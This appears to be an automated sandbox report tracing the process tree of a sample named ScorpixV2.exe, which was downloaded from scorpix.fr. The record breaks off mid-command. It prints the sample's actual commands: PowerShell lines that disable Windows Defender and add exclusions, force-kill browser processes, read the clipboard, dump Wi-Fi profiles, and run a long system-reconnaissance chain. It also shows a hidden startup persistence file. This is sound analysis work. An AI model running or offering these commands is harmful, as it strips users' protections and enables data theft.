Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5840	attrib.exe
6040	attrib.exe
1448	attrib.exe
5624	attrib.exe
2148	attrib.exe
2908	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://scorpix.fr
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f9f546f8,0x7ff8f9f54708,0x7ff8f9f54718
  2⤵
  PID:2500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
  2⤵
  PID:1612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2076 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1996 /prefetch:8
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3500 /prefetch:8
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,5121779994053458881,9901379008440522397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2052
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:5036
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"
      4⤵
      PID:2788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:2264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:3824
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        
        PID:4376
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:3548
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:1076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        7⤵
        
        PID:2956
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        7⤵
        
        PID:3256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:4256
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:4020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        7⤵
        
        PID:4700
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        8⤵
        
        PID:4348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:2988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:6076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:1136
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:5540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:5360
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:3804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4688"
        7⤵
        
        PID:4604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4688
        8⤵
        Kills process with taskkill
        
        PID:396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4160"
        7⤵
        
        PID:5744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5752
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4160
        8⤵
        Kills process with taskkill
        
        PID:5396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3644"
        7⤵
        
        PID:4572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3644
        8⤵
        Kills process with taskkill
        
        PID:5756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 652"
        7⤵
        
        PID:5876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 652
        8⤵
        Kills process with taskkill
        
        PID:5628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2736"
        7⤵
        
        PID:532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2736
        8⤵
        Kills process with taskkill
        
        PID:1076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        7⤵
        
        PID:6008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3256
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        8⤵
        
        PID:5964
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:5436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        7⤵
        
        PID:1432
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        8⤵
        
        PID:5980
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:5544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:1248
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        7⤵
        Clipboard Data
        
        PID:4888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        8⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4024
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        7⤵
        Network Service Discovery
        
        PID:5640
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:5340
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        8⤵
        
        PID:1012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        8⤵
        Collects information from the system
        
        PID:228
        
        C:\Windows\system32\net.exe
        
        net user
        8⤵
        
        PID:2604
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        9⤵
        
        PID:468
        
        C:\Windows\system32\query.exe
        
        query user
        8⤵
        
        PID:4292
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        9⤵
        
        PID:4352
        
        C:\Windows\system32\net.exe
        
        net localgroup
        8⤵
        
        PID:3092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        9⤵
        
        PID:432
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        8⤵
        
        PID:4552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        9⤵
        
        PID:4780
        
        C:\Windows\system32\net.exe
        
        net user guest
        8⤵
        
        PID:1068
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        9⤵
        
        PID:320
        
        C:\Windows\system32\net.exe
        
        net user administrator
        8⤵
        
        PID:4224
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        9⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        8⤵
        
        PID:2700
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        8⤵
        Enumerates processes with tasklist
        
        PID:1592
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        8⤵
        Gathers network information
        
        PID:652
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        8⤵
        
        PID:1760
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        8⤵
        Network Service Discovery
        
        PID:4068
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        8⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:1412
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        8⤵
        Launches sc.exe
        
        PID:4284
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5416
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:2788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4704
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:4800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:5196
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4836
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4084
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:4892
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:2904
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4740
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4860
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
      4⤵
      PID:2396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4836
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1416
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:1548
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:316
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2456
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3748
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1756
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4860
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4056
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:4088
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 